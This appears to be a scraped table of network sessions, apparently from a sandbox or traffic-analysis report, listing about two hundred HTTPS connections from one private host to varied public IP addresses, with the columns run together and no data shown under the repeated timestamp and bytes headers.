                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20243192.168.2.1454314130.179.13.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20244192.168.2.145226646.103.152.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20245192.168.2.1434186149.8.180.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20246192.168.2.1445580147.107.120.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20247192.168.2.144400260.141.220.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20248192.168.2.1455628204.16.136.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20249192.168.2.145725437.27.64.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20250192.168.2.145538627.58.133.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20251192.168.2.1451736118.235.35.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20252192.168.2.1452928152.148.213.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20253192.168.2.1452664197.234.129.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20254192.168.2.1455762102.20.65.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20255192.168.2.144741627.119.5.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20256192.168.2.1452796100.181.249.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20257192.168.2.1440846125.208.36.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20258192.168.2.145816444.109.141.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20259192.168.2.1451778187.175.64.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20260192.168.2.1458924142.8.228.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20261192.168.2.145491270.222.155.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20262192.168.2.1441188106.89.38.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20263192.168.2.1435538170.159.6.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20264192.168.2.1442646123.249.117.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20265192.168.2.143976276.14.122.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20266192.168.2.1437210154.158.53.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20267192.168.2.1450598178.46.147.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20268192.168.2.1460800143.14.34.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20269192.168.2.1434314106.6.37.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20270192.168.2.144851674.216.34.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20271192.168.2.1434998185.209.219.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20272192.168.2.1435556148.11.38.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20273192.168.2.1443292171.12.200.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20274192.168.2.1449646109.160.151.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20275192.168.2.14503682.17.227.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20276192.168.2.1433700161.31.78.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20277192.168.2.144883813.205.98.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20278192.168.2.145517819.238.199.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20279192.168.2.144966838.99.192.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20280192.168.2.14490448.79.6.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20281192.168.2.145160451.48.38.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20282192.168.2.1456088140.198.133.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20283192.168.2.1438434219.204.3.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20284192.168.2.143282639.93.248.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20285192.168.2.1453144199.209.67.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20286192.168.2.143993489.237.173.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20287192.168.2.1446650166.135.238.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20288192.168.2.1457950102.233.70.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20289192.168.2.1441150171.115.243.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20290192.168.2.1446856189.127.180.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20291192.168.2.1436848132.195.71.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20292192.168.2.1437584120.158.237.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20293192.168.2.1456070195.209.148.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20294192.168.2.145618467.35.75.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20295192.168.2.1459028177.250.188.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20296192.168.2.1452688185.88.76.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20297192.168.2.145251694.74.186.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20298192.168.2.1459830145.195.173.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20299192.168.2.14374829.158.100.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20300192.168.2.145982266.208.12.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20301192.168.2.1443200109.9.158.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20302192.168.2.1444438198.175.182.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20303192.168.2.1435776176.108.21.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20304192.168.2.144278654.111.211.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20305192.168.2.143627624.92.81.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20306192.168.2.1450228124.170.205.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20307192.168.2.1452554136.100.134.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20308192.168.2.1459910145.59.47.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20309192.168.2.144301642.44.51.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20310192.168.2.145112868.2.52.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20311192.168.2.1455678179.172.76.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20312192.168.2.145261017.38.172.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20313192.168.2.144832427.71.156.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20314192.168.2.1460596133.122.135.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20315192.168.2.1455352164.199.174.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20316192.168.2.1446514177.247.150.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20317192.168.2.1435298186.249.152.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20318192.168.2.1453892154.32.99.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20319192.168.2.144216271.243.170.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20320192.168.2.1443404131.187.12.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20321192.168.2.1437078111.133.212.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20322192.168.2.1445230131.30.199.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20323192.168.2.146041262.237.178.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20324192.168.2.1454276181.134.109.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20325192.168.2.1455584170.193.188.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20326192.168.2.1453876192.102.53.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20327192.168.2.1434472156.42.112.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20328192.168.2.1452916209.199.243.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20329192.168.2.1459132199.208.18.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20330192.168.2.1453422142.219.237.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20331192.168.2.1448156186.191.165.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20332192.168.2.1459086198.193.148.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20333192.168.2.1439084158.168.227.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20334192.168.2.1450968138.62.146.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20335192.168.2.1440026104.164.28.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20336192.168.2.143380632.203.222.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20337192.168.2.1449588208.249.176.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20338192.168.2.146017894.131.205.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20339192.168.2.1438326196.70.22.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20340192.168.2.1437954195.142.159.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20341192.168.2.144994269.43.221.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20342192.168.2.1437002205.95.171.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20343192.168.2.1435874129.107.137.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20344192.168.2.143679686.170.153.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20345192.168.2.145551252.190.206.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20346192.168.2.1447418103.10.59.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20347192.168.2.144506058.99.14.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20348192.168.2.145597638.96.197.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20349192.168.2.14566322.11.93.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20350192.168.2.1437602161.118.13.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20351192.168.2.1437248203.39.166.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20352192.168.2.144154871.206.222.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20353192.168.2.1437864149.95.53.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20354192.168.2.144389238.101.162.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20355192.168.2.143452053.125.229.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20356192.168.2.1452980191.240.80.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20357192.168.2.1442644120.245.104.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20358192.168.2.145131688.12.149.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20359192.168.2.1441362197.165.134.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20360192.168.2.145673019.210.201.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20361192.168.2.1456902130.154.145.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20362192.168.2.1437666106.127.128.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20363192.168.2.1442942206.147.125.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20364192.168.2.1445562208.112.190.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20365192.168.2.1454060219.29.210.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20366192.168.2.145550675.210.248.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20367192.168.2.144852872.249.30.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20368192.168.2.145544218.114.121.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20369192.168.2.1445332197.252.37.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20370192.168.2.14508004.253.189.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20371192.168.2.1447316195.161.253.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20372192.168.2.1450836195.221.20.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20373192.168.2.1452398116.116.154.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20374192.168.2.1435992203.123.241.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20375192.168.2.145345018.35.117.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20376192.168.2.144143249.26.231.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20377192.168.2.1441432200.131.224.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20378192.168.2.144020884.17.199.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20379192.168.2.144688274.250.227.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20380192.168.2.1450776171.251.35.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20381192.168.2.1442596195.93.117.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20382192.168.2.1444808114.154.54.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20383192.168.2.1452258154.92.200.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20384192.168.2.1459160131.59.83.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20385192.168.2.145413431.129.190.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20386192.168.2.1454776217.42.198.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20387192.168.2.145772244.185.115.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20388192.168.2.1453020148.140.56.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20389192.168.2.145055447.198.20.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20390192.168.2.144564685.37.66.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20391192.168.2.145319835.91.113.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20392192.168.2.145254634.50.49.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20393192.168.2.1460954196.210.166.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20394192.168.2.1436758207.159.186.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20395192.168.2.145436043.246.66.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20396192.168.2.1456434118.228.116.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20397192.168.2.1433278186.128.40.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20398192.168.2.1438070174.254.219.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20399192.168.2.1459972183.201.11.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20400192.168.2.1442966218.235.178.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20401192.168.2.1442524162.222.153.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20402192.168.2.143584877.31.65.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20403192.168.2.1445840124.134.44.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20404192.168.2.144291617.235.10.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20405192.168.2.144560274.252.223.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20406192.168.2.145880059.70.6.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20407192.168.2.14406209.17.61.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20408192.168.2.145381498.68.195.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20409192.168.2.144439092.189.68.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20410192.168.2.1455790168.94.28.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20411192.168.2.1447416117.141.173.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20412192.168.2.1447714200.28.161.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20413192.168.2.1457494180.47.125.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20414192.168.2.1452686188.219.113.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20415192.168.2.1436866136.178.95.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20416192.168.2.143700674.61.233.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20417192.168.2.1441226113.37.91.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20418192.168.2.1448536170.253.229.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20419192.168.2.1439296105.180.232.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20420192.168.2.143551649.105.237.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20421192.168.2.1459896219.49.150.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20422192.168.2.143566218.32.201.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20423192.168.2.1438010190.207.79.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20424192.168.2.1448594113.249.245.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20425192.168.2.144531689.25.92.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20426192.168.2.1437232161.23.144.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20427192.168.2.1457274135.130.158.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20428192.168.2.1443520206.125.7.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20429192.168.2.1446994176.148.124.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20430192.168.2.1460576175.34.233.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20431192.168.2.145786223.181.57.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20432192.168.2.144285042.59.209.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20433192.168.2.1440414102.5.239.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20434192.168.2.144349069.247.117.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20435192.168.2.1441810198.121.169.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20436192.168.2.1448524209.53.106.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20437192.168.2.1449218129.204.12.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20438192.168.2.1460176191.80.136.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20439192.168.2.1447852113.10.124.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20440192.168.2.144748876.88.74.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20441192.168.2.143292646.136.133.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20442192.168.2.1441410180.93.79.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20443192.168.2.1441980197.255.222.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20444192.168.2.1446944222.248.120.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20445192.168.2.145711814.31.216.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20446192.168.2.1437222159.241.226.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20447192.168.2.14584769.182.184.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20448192.168.2.14471381.91.196.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20449192.168.2.143555436.133.226.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20450192.168.2.14529229.196.138.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20451192.168.2.1447174101.18.152.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20452192.168.2.1439004159.221.186.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20453192.168.2.1433930160.251.221.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20454192.168.2.144433431.2.187.71443
                                                      TimestampBytes transferredDirectionData


